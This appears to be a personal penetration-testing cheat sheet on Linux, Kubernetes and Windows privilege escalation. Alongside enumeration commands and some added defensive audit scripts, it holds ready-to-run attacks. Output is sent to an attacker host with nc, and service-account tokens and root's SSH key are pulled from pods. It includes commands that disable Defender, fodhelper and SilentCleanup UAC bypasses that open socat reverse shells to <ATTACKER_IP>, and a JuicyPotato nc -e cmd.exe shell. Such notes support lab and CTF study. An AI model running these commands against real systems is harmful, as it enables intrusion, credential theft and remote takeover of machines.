Privilege Escalation (PrivEsc)

NOTE: scripts are noisy for any sort of monitoring software, so manual checks may be preferred

Key Details

Collect the following (versions where applicable):

  • OS
  • Kernel
  • Services
  • Installed packages
  • Logged-in users
  • User Directories
  • Command/Shell History
  • Configuration Files
  • Scheduled Jobs
  • Extra File Systems/Drives
  • File Permissions
  • Writeable Files and Directories

🐧 Linux

linPEAS

# === ATTACKER ===

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
ip a ; python3 -m http.server 8000

# === TARGET ===

cd /tmp
wget http://<ATTACKER_IP>:8000/linpeas.sh && chmod +x linpeas.sh
REGEXES="0" ./linpeas.sh 2>&1 | tee linpeas_output.txt

# === ATTACKER ===

scp <USER>@<TARGET>:/tmp/linpeas_output.txt ~/
# Alternatively, transfer it with nc: on the attacker
nc -l -p <PORT> > ~/linpeas_output.txt
# then on the target
cat /tmp/linpeas_output.txt | nc <ATTACKER_IP> <PORT>
# wait a moment, then CTRL+C

Manual Survey

whoami ; id ; hostname ; ip a || ifconfig -a
uname -a ; cat /etc/*release*

arp -an
ip r || netstat -rn
netstat -tun
# For domains
cat /etc/resolv.conf /etc/hosts

netstat -tuanlp || ss -tuanlp

# Check non-standard paths or variables
echo $PATH
env

cat /etc/shells

lsblk
cat /etc/fstab
df -h
# Unmounted filesystems
cat /etc/fstab | grep -v "#" | column -t

# Debian-based systems
dpkg -l

ps -ef
pstree
# Interesting commands
for p in /proc/[0-9]*; do cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null); [ -n "$cmd" ] && echo "[PID: ${p##*/}] $cmd"; done

# Users only
cat /etc/passwd | cut -f1 -d:
# Users with shell access
cat /etc/passwd | grep sh
# Groups
cat /etc/group
# Active or recent users
w ; lastlog

===
# LOOKING FOR PRIV ESCs
===

# GTFObins Priv Esc check
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
for i in $(curl -s https://gtfobins.org/api.json | jq -r '.executables | keys[]'); do if grep -q "$i" installed_pkgs.list; then echo "Check for GTFO: $i";fi; done

ls -la /etc/crontab /var/spool/cron/crontabs/root /etc/cron.*

ls -la / /home/ /home/*/.ssh/ /root/.ssh/

# Conf files
find / \( -path "/proc" -o -path "/usr" -o -path "/lib" \) -prune -o \( -iname "*.conf" -o -iname "*.config" \) -exec ls -la {} + 2>/dev/null
# Search for all files that contain keyword in name
find / \( -path "/proc" -o -path "/usr" -o -path "/lib" \) -prune -o -type f -iname "<KEYWORD>" -exec ls -la {} + 2>/dev/null
# Creds Search
grep -Hran --color=always --exclude-dir={bin,boot,dev,lib,lib64,proc,sys,sbin,snap,run,usr} 'user\|passw' / 2>/dev/null | less -R

# History
history
find / -type f \( -name '*_hist' -o -name '*_history' \) -exec ls -l {} \; 2>/dev/null

# Search for interesting scripts
find / -type f -name '*.sh' 2>/dev/null | grep -v "src\|snap\|share"
find / -name '*.sh' 2>/dev/null

# Hidden folders and files
# NOTE: usually best to grep for a user or something to reduce results
find / -type d -name ".*" -ls 2>/dev/null
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep <KEYWORD>

# Temp folders
ls -la /tmp /var/tmp /dev/shm

# Writeable Files (-print keeps the pruned directories themselves out of the output)
find / \( -path /proc -o -path /sys -o -path /var \) -prune -o -type f -perm -o+w -print 2>/dev/null
# Writeable directories
find / \( -path /proc -o -path /sys -o -path /var \) -prune -o -type d -perm -o+w -print 2>/dev/null
# SETUID Files (user executes program as owner user)
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# SETGID Files (user groups executes program as owner group)
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
# World-writeable files
find / -type f -perm -00002 -ls 2>/dev/null

# Users with shells
grep "sh$" /etc/passwd

cat /etc/group
# Users in "sudo" group
getent group sudo

# Rarely hashes in passwd or readable shadow
cat /etc/passwd /etc/shadow

# Summarized reports of logs
aureport --tty | less

# CTF Special
sudo -V  # Check version exploits
sudo -l  # Look for NOPASSWD

File Permissions

Standard Permission Bits

  • Read (octal 4, symbol r): on a file, can read its contents (cat); on a directory, can list its contents (ls).
  • Write (octal 2, symbol w): on a file, can modify its contents; on a directory, can add or delete files inside it.
  • Execute (octal 1, symbol x): on a file, can run it as a process; on a directory, can enter it (cd).

Special Permission Bits

  • SUID (Set-User-ID), octal 4000, symbol s / S, shown in the Owner triplet (-rwS------). Offensive value (PrivEsc / Persistence): High. The process runs with the privileges of the file Owner (usually root), regardless of who launched it.
  • SGID (Set-Group-ID), octal 2000, symbol s / S, shown in the Group triplet (----rws---). Offensive value: Medium. The process runs with the privileges of the file Group. Used for lateral movement (e.g., accessing adm or shadow group files).
  • Sticky Bit, octal 1000, symbol t / T, shown in the Other triplet (-------rwt). Offensive value: None. Prevents users from deleting other users’ files in shared directories (like /tmp).

NOTE:

The Lowercase s vs. Uppercase S

  • Lowercase s (Active): The SUID bit is set AND the underlying execute (x) bit is set. The file will execute properly.
  • Uppercase S (Broken): The SUID bit is set, BUT the underlying execute (x) bit is missing. The file cannot be executed. The admin made a mistake.

The Linux Kernel natively ignores SUID/SGID bits on interpreted scripts (.sh, .py, .pl).

  • If you find -rwsr-xr-x root root backup.sh, running ./backup.sh will execute as YOUR user, not root.
  • The Exception: SUID only works automatically on Compiled ELF Binaries (C, C++, Go, Rust).
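
As an added example (not from these notes), the following Python script performs the SUID/SGID survey above and applies the s/S and script rules automatically; the directory to scan is its only input, and the file names in its test data are constructed.

```python
import os
import stat
import sys
from dataclasses import dataclass

# Added example, not part of the original notes: walk a directory tree and
# report files carrying SUID/SGID, classifying each bit the way ls shows it
# ("s" = set on top of an execute bit, "S" = set without it) and flagging
# interpreted scripts, on which the kernel ignores the bit anyway.


@dataclass
class SpecialBitFinding:
    path: str
    mode: str     # symbolic mode as ls prints it, e.g. -rwsr-xr-x
    uid: int      # owner uid; 0 is the case that matters most
    suid: str     # "" (not set), "s" (effective) or "S" (set, but no x bit)
    sgid: str     # same encoding for the group bit
    script: bool  # file starts with "#!", so the bit is not honoured


def bit_state(mode: int, set_bit: int, exec_bit: int) -> str:
    """Return "", "s" or "S" for one special bit, mirroring ls output."""
    if not mode & set_bit:
        return ""
    return "s" if mode & exec_bit else "S"


def is_script(path: str) -> bool:
    """True if the file begins with a shebang line."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def audit_special_bits(root: str) -> list[SpecialBitFinding]:
    """Report every regular file under root (symlinks not followed) that
    carries SUID or SGID, whether or not the bit is effective."""
    findings: list[SpecialBitFinding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry, like find ... 2>/dev/null
            if not stat.S_ISREG(st.st_mode):
                continue
            suid = bit_state(st.st_mode, stat.S_ISUID, stat.S_IXUSR)
            sgid = bit_state(st.st_mode, stat.S_ISGID, stat.S_IXGRP)
            if suid or sgid:
                findings.append(SpecialBitFinding(
                    path, stat.filemode(st.st_mode), st.st_uid,
                    suid, sgid, is_script(path)))
    return sorted(findings, key=lambda f: f.path)


def describe(f: SpecialBitFinding) -> str:
    """One-line verdict a reviewer can act on."""
    if f.script:
        return f"{f.path}: {f.mode} on a script; the kernel ignores the bit"
    if "S" in (f.suid, f.sgid):
        return f"{f.path}: {f.mode} special bit without execute bit (misconfigured, not runnable)"
    who = "root" if f.uid == 0 else f"uid {f.uid}"
    return f"{f.path}: {f.mode} effective special bit, runs as {who}; confirm it is expected"


if __name__ == "__main__":
    for finding in audit_special_bits(sys.argv[1] if len(sys.argv) > 1 else "/usr/bin"):
        print(describe(finding))
```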

Groups

Certain groups for a user’s id output could give greater access:

  • disk: can open any block device directly (e.g. with debugfs) and read the whole file system, bypassing file permissions
  • adm: reads logs in /var/log/
  • docker: priv esc
  • lxd/lxc: can mount filesystems in LXC containers
  • shadow: allows read access of password hashes
  • staff: grants perms to /usr/local/bin/ and /usr/local/sbin/
  • wireshark/pcap: capture network traffic (creds sniffing)
  • video: can screenshot user’s desktop
  • wheel: Red Hat/CentOS equivalent to sudo

Capabilities

The following especially can lead to root:

  • cap_setuid: Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the root user.
  • cap_setgid: Allows a process to set its effective group ID, which can be used to gain the privileges of another group, including the root group.
  • cap_sys_admin: Provides a broad range of administrative privileges, including the ability to perform many actions reserved for the root user, such as modifying system settings and mounting and unmounting file systems.
  • cap_dac_override: Allows bypassing of file read, write, and execute permission checks.

# Easy wins
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

# Exhaustive
getcap -r / 2>/dev/null
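
An added Python helper (not part of the original notes) that parses the getcap output above, in both the older "path = caps" layout and the newer "path caps" layout, and flags the four capabilities listed when they sit in the permitted or effective set; the sample lines are constructed, not taken from a real host.

```python
import re
import sys

# Added example, not part of the original notes: parse getcap output and
# report binaries whose file capabilities include one of the four listed
# above in the permitted (p) or effective (e) set. A cap that is only
# inheritable (i) is not reported. "all=..." is left unexpanded.

DANGEROUS = {
    "cap_setuid": "can change its effective uid to 0",
    "cap_setgid": "can change its effective gid to 0",
    "cap_sys_admin": "broad admin rights, including mounting",
    "cap_dac_override": "bypasses file read/write/execute checks",
}

CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")


def parse_getcap_line(line: str):
    """Return (path, {cap: set(flags)}) or None for a non-matching line."""
    tokens = line.strip().split()
    idx = next((i for i, t in enumerate(tokens) if t.startswith(("cap_", "all"))), None)
    if idx is None:
        return None
    path_tokens = tokens[:idx]
    if path_tokens and path_tokens[-1] == "=":   # older libcap prints "path = caps"
        path_tokens = path_tokens[:-1]
    path = " ".join(path_tokens)                 # re-joins paths containing spaces
    caps: dict[str, set[str]] = {}
    for clause in tokens[idx:]:
        m = CLAUSE_RE.match(clause)
        if not m:
            return None
        names, op, flags = m.groups()
        for cap in names.split(","):
            current = caps.setdefault(cap, set())
            if op == "-":
                current.difference_update(flags)
            else:                                # "=" and "+" both grant the listed sets
                current.update(flags)
    return path, caps


def dangerous_binaries(getcap_output: str):
    """Return [(path, cap, flags, why)] for caps that are permitted or effective."""
    hits = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for cap, flags in caps.items():
            if cap in DANGEROUS and flags & {"e", "p"}:
                hits.append((path, cap, "".join(sorted(flags)), DANGEROUS[cap]))
    return hits


# Constructed sample covering both layouts, a path with a space and an i-only cap.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/backup cap_dac_override=p
/opt/my tool/bin/helper = cap_sys_admin+ep
/usr/bin/harmless cap_setuid=i
"""

if __name__ == "__main__":
    text = SAMPLE_GETCAP if sys.stdin.isatty() else sys.stdin.read()
    for path, cap, flags, why in dangerous_binaries(text):
        print(f"{path}: {cap}={flags} ({why})")
```

Pipe real output in with `getcap -r / 2>/dev/null | python3 getcap_audit.py` (the file name is whatever you save it as).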

Mitigation

A straightforward tool to assess the security posture of UNIX devices is:

Kubernetes

Control Plane

The Control Plane serves as the management layer. It consists of several crucial components, including:

  • etcd: TCP 2379, 2380
  • API server: TCP 6443
  • Scheduler: TCP 10251
  • Controller Manager: TCP 10252
  • Kubelet API: TCP 10250
  • Read-Only Kubelet API: TCP 10255

# Check for API server
curl -k https://<TARGET>:6443

# Pods list
curl -k https://<TARGET>:6443/pods | jq .

# Native pods enumeration
kubeletctl -i --server <TARGET> pods

# Scan for known RCEs against nodes
kubeletctl -i --server <TARGET> scan rce

# Interact with node
kubeletctl -i --server <TARGET> exec "id" -p nginx -c nginx

# Extracting tokens
kubeletctl -i --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token

# Extracting certificates
kubeletctl --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt

# List privileges
export token=$(cat k8.token)
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 auth can-i --list

privesc.yaml

This mounts the host’s root file system into the pod (at /root inside the container):

apiVersion: v1
kind: Pod
metadata:
  name: privesc
  namespace: default
spec:
  containers:
  - name: privesc
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
       path: /
  automountServiceAccountToken: true
  hostNetwork: true

# Create new pod
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 apply -f privesc.yaml

# Verify
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 get pods

# Get root key
kubeletctl --server <TARGET> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
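
An added static check (not from the original notes) for the settings the privesc.yaml manifest above relies on; PRIVESC_POD is that manifest converted to a dict, and reading a YAML file from disk assumes PyYAML is installed (it is imported only in that case). The same check also covers workload templates (Deployment, DaemonSet, Job), which the page's manifest does not use.

```python
import sys
from typing import Any

# Added example, not part of the original notes: flag the pod settings used
# for a node escape (hostPath "/", host namespaces, a mounted SA token,
# privileged containers). Think of it as a pre-admission review of a manifest.

PRIVESC_POD: dict[str, Any] = {  # the page's privesc.yaml as a dict
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "privesc", "namespace": "default"},
    "spec": {
        "containers": [{
            "name": "privesc",
            "image": "nginx:1.14.2",
            "volumeMounts": [{"mountPath": "/root", "name": "mount-root-into-mnt"}],
        }],
        "volumes": [{"name": "mount-root-into-mnt", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}


def pod_spec(manifest: dict) -> dict:
    """Pod spec for a Pod, or the template spec of a Deployment/DaemonSet/Job."""
    spec = manifest.get("spec", {})
    if manifest.get("kind") == "Pod":
        return spec
    return spec.get("template", {}).get("spec", spec)


def check_pod(manifest: dict) -> list[tuple[str, str]]:
    """Return (rule, detail) pairs; empty means none of the checked settings is present."""
    spec = pod_spec(manifest)
    findings = []
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    mounts: dict[str, list[tuple[str, str]]] = {}  # volume name -> [(container, mountPath)]
    for c in containers:
        for vm in c.get("volumeMounts", []):
            mounts.setdefault(vm["name"], []).append((c["name"], vm["mountPath"]))
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(("privileged", f"container {c['name']} runs privileged"))
        if "SYS_ADMIN" in sc.get("capabilities", {}).get("add", []):
            findings.append(("cap_sys_admin", f"container {c['name']} adds CAP_SYS_ADMIN"))
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            hp = vol["hostPath"].get("path", "")
            where = ", ".join(f"{cn} at {mp}" for cn, mp in mounts.get(vol["name"], [])) or "not mounted"
            severity = "host root filesystem" if hp == "/" else "host path"
            findings.append(("hostPath", f"{severity} {hp} mounted in {where}"))
    for ns in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(ns):
            findings.append((ns, f"{ns}: true shares the node's namespace"))
    if spec.get("automountServiceAccountToken", True):
        findings.append(("saToken", "service-account token is mounted (default when not set to false)"))
    return findings


if __name__ == "__main__":
    manifest = PRIVESC_POD
    if len(sys.argv) > 1:
        import yaml  # PyYAML; only needed to read a manifest file from disk
        with open(sys.argv[1]) as fh:
            manifest = yaml.safe_load(fh)
    for rule, detail in check_pod(manifest):
        print(f"[{rule}] {detail}")
```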

🪟 Windows

Check [[active-directory]] for a whole host of domain-related priv escs. Check [[security-products]] for bypasses for UAC and more. Check [[finding-creds]] for searching for credentials.

systeminfo wesng.py Analyzer

git clone https://github.com/bitsadmin/wesng.git && cd wesng
python3 wes.py ~/loot/systeminfo.txt

SharpUp

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe

.\SharpUp.exe audit

winPEAS

Manual Survey

# Networking info
ipconfig /all
arp -a
route print

# BEST?: Programs w/ Versions
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

# Installed programs
for %f in ("C:\Program Files", "C:\Program Files (x86)") do @(echo. && echo --- Listing: %~f --- && dir "%~f" /b)

# WMI Method
# NOTE: querying Win32_Product triggers an MSI consistency check (and possible repair) of every installed package; slow and noisy
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version

Normal processes:

# Running processes and services
tasklist /svc
netstat -ano

# Scheduled Tasks
schtasks /query /fo LIST /v

# Env Variables
set

# Detailed machine info
systeminfo
ver
[environment]::OSVersion.Version

# Alt method for Hotfixes
wmic qfe list brief
Get-HotFix | ft -AutoSize

# Query logged-in users (usually RDP)
query user

# Current user
echo %USERNAME%

# Current User Privs & Groups
whoami /all

# User accounts w/ Descriptions
Get-LocalUser
# All users, groups, admins, password policy
net user
net user %username%
net localgroup
net localgroup administrators
net accounts
gpresult /r

# Command line history
(Get-PSReadLineOption).HistorySavePath

# List Named Pipes
pipelist.exe /accepteula
Get-ChildItem \\.\pipe\
# Show Named Pipe Permissions
# NOTE: Drop the "\\."
accesschk.exe /accepteula \pipe\<NAME> -v

Windows Defender

# Check WinDefend service
sc.exe query windefend

# Check Status
Get-MpComputerStatus

# Enable WinDefend
Set-MpPreference -DisableRealtimeMonitoring $false
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $false"

# Disable WinDefend realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

Windows Firewall

# Show state of all profiles
netsh advfirewall show allprofiles
# Add Firewall Exception
netsh advfirewall firewall add rule name=<NAME> dir=in action=allow protocol=TCP localport=<PORT>

AppLocker

Built-in application whitelister. Commonly cmd.exe and powershell.exe will be blocked, but PowerShell lives in multiple locations:

# Get Rules
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

User Account Control

NOTE: These work when UAC is NOT set to “Always Notify”

# msconfig
WIN+R > msconfig > Tools > Select "Command Prompt" > Launch

# azman.msc
Help > Help Topics > Right-Click > View Source > Show "All Files" > Search and Select "cmd.exe" > Right-Click > Open

# Fodhelper.exe w/ Socat
nc -nvlp <PORT>

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

whoami /groups
// success HIGH!

reg delete HKCU\Software\Classes\ms-settings\ /f
reg query %REG_KEY% /v ""

# WinDefend-Safe UAC Bypass w/ Socat
powershell.exe

$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe <ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.update\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.update\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".update" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
// success!

reg delete "HKCU\Software\Classes\.update\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

# "Always Notify"-Safe UAC Bypass (but NOT WinDefend-Safe)
nc -lvnp <PORT>
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe <ATTACKER_IP>:<PORT> EXEC:cmd.exe,pipes &REM " /f
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
// success!

reg delete "HKCU\Environment" /v "windir" /f

# Auto-Bypass (up-to-date)
# https://github.com/hfiref0x/UACME

C:\tools\UACME-Akagi64.exe 33

Privileges vs. Access Rights

  • https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e

  • Privileges are tied to WHO, i.e. the user’s access token (assigned at logon; can differ between local and domain logons), and are essentially overrides that bypass the normal rules (access rights)

    • SeTakeOwnershipPrivilege: Allows you to change the Owner of any object. Once you are the Owner, Windows automatically grants you the Access Right to rewrite the DACL (known as WRITE_DAC). You can then grant yourself GenericAll Access Rights.
    • SeImpersonatePrivilege: Allows you to copy a higher-privileged Token (e.g., NT AUTHORITY\SYSTEM via tools like SweetPotato/PrintSpoofer), instantly granting you all System Privileges and Universal Access Rights.
  • Access Rights (permissions) are tied to WHAT/the object (File, Folder, Registry Key, Service, Named Pipe) via “Security Descriptors”

  • Security Principals are the WHO: users, machines, or groups that have their own SIDs (groups cannot log in, but they do hold Access Rights)

When a Security Principal (e.g. user) wants to access a resource (e.g. file), the OS will perform an authorization check of the user against the resource’s Security Descriptor (e.g. access rights). The Security Descriptor might have multiple Access Control Entries, which will grant access if there is at least 1 match.

Authentication Process - Windows

Good Privileges

Format: setting constant (setting name; standard assignment): description.

  • SeNetworkLogonRight (Access this computer from the network; Administrators, Authenticated Users): Determines which users can connect to the device from the network. This is required by network protocols such as SMB, NetBIOS, CIFS, and COM+.
  • SeRemoteInteractiveLogonRight (Allow log on through Remote Desktop Services; Administrators, Remote Desktop Users): Determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server.
  • SeBackupPrivilege (Back up files and directories; Administrators): Determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
  • SeSecurityPrivilege (Manage auditing and security log; Administrators): Determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer.
  • SeTakeOwnershipPrivilege (Take ownership of files or other objects; Administrators): Determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads.
  • SeDebugPrivilege (Debug programs; Administrators): Determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right; developers who are debugging new system components do. This user right provides access to sensitive and critical operating system components.
  • SeImpersonatePrivilege (Impersonate a client after authentication; Administrators, Local Service, Network Service, Service): Determines which programs are allowed to impersonate a user or another specified account and act on behalf of the user.
  • SeLoadDriverPrivilege (Load and unload device drivers; Administrators): Determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code.
  • SeRestorePrivilege (Restore files and directories; Administrators): Determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It also determines which users can set valid security principals as the owner of an object.
  • SeTcbPrivilege (Act as part of the operating system; Administrators, Local Service, Network Service, Service): Determines whether a process can assume the identity of any user and, through this, obtain access to resources that the targeted user is permitted to access (impersonation). This may be assigned to antivirus or backup tools that need the ability to access all system files for scans or backups. This privilege should be reserved for service accounts requiring this access for legitimate activities.

Good Accounts

  • NT AUTHORITY\SYSTEM / LocalSystem: A highly privileged account with more privileges than a local administrator; used to run most Windows services. See LocalSystem account.
  • Built-in local Administrator: The built-in local administrator account. Some organizations disable this account, but many do not. It is not uncommon to see this account reused across multiple systems in a client environment.
  • Local member of Administrators: Another local account in the local Administrators group. Any account in this group has the same privileges as the built-in Administrator account.
  • Domain user in local Administrators: A standard (non-privileged) domain user who is part of the local Administrators group.
  • Domain admin in local Administrators: A domain admin (highly privileged in Active Directory) that is part of the local Administrators group.

Good Groups

  • Default Administrators: Domain Admins and Enterprise Admins are “super” groups.
  • Server Operators: Members can modify services, access SMB shares, and back up files.
  • Backup Operators: Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.
  • Print Operators: Members can log on to DCs locally and “trick” Windows into loading a malicious driver.
  • Hyper-V Administrators: If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.
  • Account Operators: Members can modify non-protected accounts and groups in the domain.
  • Remote Desktop Users: Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.
  • Remote Management Users: Members can log on to DCs with PSRemoting (this group is sometimes added to the local remote management group on non-DCs).
  • Group Policy Creator Owners: Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.
  • Schema Admins: Members can modify the Active Directory schema structure and backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.
  • DNS Admins: Members can load a DLL on a DC, but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.

File/Folder Permissions

Look for F, M, or W assigned to unprivileged groups.

Permission codes (code, meaning, offensive value):

  • F (Full Control): Jackpot. You can overwrite the file, read it, delete it, or change its permissions.
  • M (Modify): High. You can read, write, and delete the file (functionally identical to F for hijacking).
  • W (Write): High. You can overwrite the file with a malicious payload (e.g., a reverse shell .exe).
  • RX (Read & Execute): None (usually). You can read the file and run it, but you cannot alter it.
  • R (Read): Low. Useful only for stealing configuration files or hardcoded credentials.

Inheritance flags (code, meaning, context):

  • (I) Inherited: This permission wasn’t set on the file itself; it was passed down from the parent folder (e.g., C:\Program Files).
  • (OI) Object Inherit: Applied to a folder: all files inside will inherit this permission.
  • (CI) Container Inherit: Applied to a folder: all sub-folders inside will inherit this permission.
  • (IO) Inherit Only: This permission applies only to children, not the current folder itself.
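
An added Python parser (not from the original notes) for icacls output that applies the two tables above: it returns each ACE with its rights and inheritance flags and lists the F/M/W grants to low-privilege principals. The sample output and the LOW_PRIV principal list are constructed assumptions; extend the list with the domain's own low-privilege groups.

```python
import re
from dataclasses import dataclass

# Added example, not part of the original notes. Parses lines of the form
#   <path> <identity>:(flag)(flag)...        first ACE of an object
#         <identity>:(flag)(flag)...         continuation ACEs (indented)
# Identities without a known authority prefix must not contain spaces.

ACE_RE = re.compile(r"^(.*?):((?:\([^()]*\))+)\s*$")
IDENTITY_RE = re.compile(
    r"(NT AUTHORITY\\[^\\]+|BUILTIN\\[^\\]+|NT SERVICE\\[^\\]+|"
    r"APPLICATION PACKAGE AUTHORITY\\[^\\]+|CREATOR OWNER|Everyone|"
    r"S-1-[\d-]+|\S+\\\S+)$"   # last alternative: DOMAIN\name without spaces
)
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
WRITE_RIGHTS = {"F", "M", "W"}          # the codes the table marks Jackpot/High
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE"}  # assumed list; extend per environment


@dataclass
class Ace:
    path: str
    identity: str
    rights: frozenset      # e.g. {"RX"} or {"RX", "W"} from (RX,W)
    inherited: bool        # (I)
    inherit_only: bool     # (IO): applies to children, not this object
    deny: bool             # (DENY) entries never grant anything


def parse_icacls(text: str) -> list[Ace]:
    aces, path = [], ""
    for raw in text.splitlines():
        m = ACE_RE.match(raw.rstrip())
        if not m:
            continue  # e.g. the "Successfully processed N files" trailer
        left, flag_text = m.groups()
        if raw[:1].isspace():
            identity = left.strip()      # continuation line: ACE only
        else:
            im = IDENTITY_RE.search(left)
            if not im:
                continue
            identity, path = im.group(1), left[:im.start()].rstrip()
        tokens = [t for grp in re.findall(r"\(([^()]*)\)", flag_text) for t in grp.split(",")]
        aces.append(Ace(path, identity,
                        frozenset(t for t in tokens if t not in INHERIT_FLAGS | {"DENY"}),
                        "I" in tokens, "IO" in tokens, "DENY" in tokens))
    return aces


def weak_entries(aces: list[Ace], principals=frozenset(LOW_PRIV)) -> list[Ace]:
    """Allow ACEs that hand F, M or W to a low-privilege principal."""
    return [a for a in aces if not a.deny and a.identity in principals and a.rights & WRITE_RIGHTS]


# Constructed sample in icacls layout (not captured from a real host).
SAMPLE_ICACLS = r"""
C:\Program Files\Acme Agent\agent.exe NT AUTHORITY\SYSTEM:(I)(F)
                                      BUILTIN\Administrators:(I)(F)
                                      BUILTIN\Users:(I)(RX)
C:\Program Files\Acme Agent\plugins BUILTIN\Users:(OI)(CI)(M)
                                    Everyone:(OI)(CI)(IO)(W)
                                    BUILTIN\Users:(DENY)(D)
C:\Tools\svc.exe CORP\svc_backup:(F)
                 BUILTIN\Users:(RX,W)

Successfully processed 3 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for a in weak_entries(parse_icacls(SAMPLE_ICACLS)):
        note = " (inherit-only: affects new children, not the object itself)" if a.inherit_only else ""
        print(f"{a.path}: {a.identity} has {','.join(sorted(a.rights))}{note}")
```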

Exploits

via Meterpreter session:

run post/multi/recon/local_exploit_suggester

via SeImpersonate

JuicyPotato

Needs SeImpersonate or SeAssignPrimaryToken

# NOTE: Upload JuicyPotato.exe and nc.exe
nc -lnvp <PORT>
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -t *

RoguePotato/GodPotato/PrintSpoofer/PrintNightmare

Needs SeImpersonate (or equivalent for the tool chain). Upload the chosen binary and nc.exe (or use built-in shells where documented).

